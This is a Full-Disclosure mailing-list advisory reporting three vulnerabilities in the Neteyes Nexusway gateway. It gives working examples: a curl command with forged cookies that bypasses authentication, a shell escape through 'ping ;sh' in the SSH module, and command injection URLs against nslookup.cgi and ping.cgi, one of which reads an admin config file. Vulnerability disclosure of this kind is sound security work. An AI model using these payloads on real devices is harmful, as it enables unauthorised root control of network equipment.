[Full-disclosure] [Scan Associates Advisory] Neteyes Nexusway multiple vulnerability

[pokley <pokleyzz@xxxxxxxxxxxxxxxxxxx>]

Product : Neteyes Nexusway (http://www.neteyes.com.tw)
Description: Neteyes Nexusway multiple vulnerability
Severity: Very High

Description
===========
The NexusWay is a Multiservice Border Gateway that provides the
Multiaccess and Multiservice capabilities in the border segment of an
enterprise network.

Detail
======

Weak authentication in web module
---------------------------------
By sending crafted http cookies, any user with access to port 443 on
Neteyes Nexusway may use this vulnerability to become Neteyes Nexusway
admin. This will allow user to change any configuration on this device.

Example:
	# curl -k -b 'cyclone500_write=1; cyclone500_auth=1;  
client_ip1;client=0.0.0.0' https://192.168.1.135/index.cgi

Escaping to Operating System shell in SSH module
------------------------------------------------
User with access to SSH module may able to access Shell or execute any
command as "root" privileges on Neteyes Nexusway by sending crafted
argument in certain command. This will allow user to do anything on this
device.

Example:
        > ping ;sh
        > traceroute ;sh

Remote command execution in web module
--------------------------------------
Any user with access to port 443 on Neteyes Nexusway is able to fully
control Neteyes Nexusway device by sending special crafted packet to
certain administration script. Web server is run as "root" on this devices.

Example:
        
https://192.168.1.135/nslookup.cgi?ip=localhost%26%26cat%20/stand/htdocs/config/admin
        https://192.168.1.135/ping.cgi?ip=localhost%26%26touch+/tmp/test

Workaround
==========
Disable Web Administration module
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/